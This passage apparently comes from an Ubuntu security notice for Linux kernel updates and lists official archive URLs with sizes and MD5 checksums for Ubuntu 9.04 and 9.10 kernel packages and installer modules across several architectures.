http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     8874 f173072403f51e6e6da399debd91068f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    13472 1399e0100a81d92448659b83949a62a6\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   525752 1a2c59458472f4a18538df9386396703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb\n      Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb\n      Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   262814 794c683379e359de14db8806fe984f78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb\n      Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   149398 b14f79b842c979418dec65e273836cd0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   184736 a159624d12831598d35c3b00ba563182\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    34462 582363a3843fdbded2476793775ace76\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc\n      Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz\n      Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc\n      Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz\n      Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc\n      Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz\n      Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz\n      Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc\n      Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb\n      Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb\n      Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb\n      Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb\n      Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb\n      Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb\n      Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb\n      Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb\n      Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   161072 faec6563ccef41e925482b36619fca7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    73750 53978367ed22b3daba246878064b72c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5: 17943372 803487f6122441604ec3062e7bb98228\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53\n    